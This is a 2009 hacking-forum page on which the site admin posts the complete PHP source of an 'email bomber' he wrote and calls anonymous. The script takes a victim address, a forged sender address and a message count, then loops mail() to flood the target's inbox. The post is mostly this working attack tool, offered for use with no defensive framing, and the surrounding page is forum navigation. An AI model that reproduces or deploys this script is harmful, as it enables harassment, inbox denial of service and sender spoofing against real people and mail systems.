Code1
Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
HomeIndexLatest imagesRegisterLog in
We have reopened Code 1
Windows 7 will be available on October 22
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Affiliates


PSP Black Market
Want to Affiliate?

 
Latest topics
» How To Remove Watermark From Windows 7 Builds [Both X86 & X64]
PHP EMail Bomber EmptyFri Jul 17, 2009 1:28 pm by JDawson

» Windows 7 Totaly Pwns
PHP EMail Bomber EmptyFri Jul 17, 2009 10:17 am by JDawson

» Calvin (Nitro Innovation) singing Iron Maiden-Run to the hills
PHP EMail Bomber EmptyTue Jul 14, 2009 9:50 am by JDawson

» 2012 Story of Nibiru
PHP EMail Bomber EmptyTue Jul 14, 2009 9:48 am by JDawson

» Seven Transformation Pack 2.0 is here
PHP EMail Bomber EmptyMon Jul 13, 2009 10:52 am by JDawson

» [Firefox] Surf Anonymously With Foxy Proxy
PHP EMail Bomber EmptyMon Jul 13, 2009 10:16 am by JDawson

» Code 1 reopened.
PHP EMail Bomber EmptyFri Jul 10, 2009 7:42 pm by JDawson

» PHP EMail Bomber
PHP EMail Bomber EmptyFri Jul 10, 2009 7:32 pm by JDawson

» Dell Launches Studio Hybrid Energy-Efficient PC
PHP EMail Bomber EmptySun Mar 22, 2009 11:16 am by JDawson

Poll
Top posters
JDawson
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
Muaddib
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
pleek
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
JShafer
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
bighoss1025
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
colp
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
prohalo
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
jjhurtado
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
zack64
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 
Carlos
PHP EMail Bomber Vote_lcapPHP EMail Bomber I_voting_barPHP EMail Bomber Vote_rcap 

 

 PHP EMail Bomber

Go down 
AuthorMessage
JDawson
Admin
Admin
JDawson


Male Number of posts : 127
Age : 29
Location : At my computer
Reputation : 0
Registration date : 2008-12-31

PHP EMail Bomber Empty
PostSubject: PHP EMail Bomber   PHP EMail Bomber EmptyFri Jul 10, 2009 7:32 pm

Here is a php email bomber i made
its anonymous

Code:
<?php
//Created By JDawson
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Ebomber 1.1</title>
<meta name="Description" content="A PHP Email Bomber />
<meta name="Keywords" content="php, email, bomber, JDawson, ebomber" />
</head>

<body>
<form method="post" action="">
<b>Email To Bomb:</b><br />
<input type="text" name="emailto" size="53"><br />
<b>Return Email:</b><br />
<input type="text" name="emailfrom" size="53"><br />
<b>Subject:</b><br />
<input type="text" name="subject" size="53"><br />
<b>Message Body:</b><br />
<textarea name="message" rows="6" cols="40"></textarea>
<br /><br />

<b>Send <input type="text" name="sendamount" size="1" value="1"> Email(s).</b> <input type="submit" name="bombmail" value="Bomb EM!">
</form>

<?php
if (isset($_REQUEST['bombmail'])){
$emailto = $_POST['emailto'];
$emailfrom = "From: ".$_POST['emailfrom'];
$subject = $_POST['subject'];
$message = $_POST['message'];
$sendamount = $_POST['sendamount'];
$i = 0;
if ($emailto == ""){
echo "<br /><b>Error: You must enter an email to bomb!</b>";
} else if ($emailfrom == ""){
echo "<br /><b>Error: You must enter an email to send from!</b>";
} else if ($subject == ""){
echo "<br /><b>Error: You did not enter a subject for your message!</b>";
} else if ($message == ""){
echo "<br /><b>Error: You did not enter a message to send!</b>";
} else if ($sendamount == ""){
echo "<br /><b>Error: You did not enter a valid amount of emails to send!</b>";
} else {
do {
mail($emailto, $subject, $message, $emailfrom);
$i++;
}
while ($i<$sendamount);
echo "<br /><b>You have successfully bombed ".$emailto." with ".$i." emails!</b>";
}
}
?>
Back to top Go down
http://www.Codeone.tk
 
PHP EMail Bomber
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Code1 :: Source Code :: Html, Java, PHP, and ajax-
Jump to: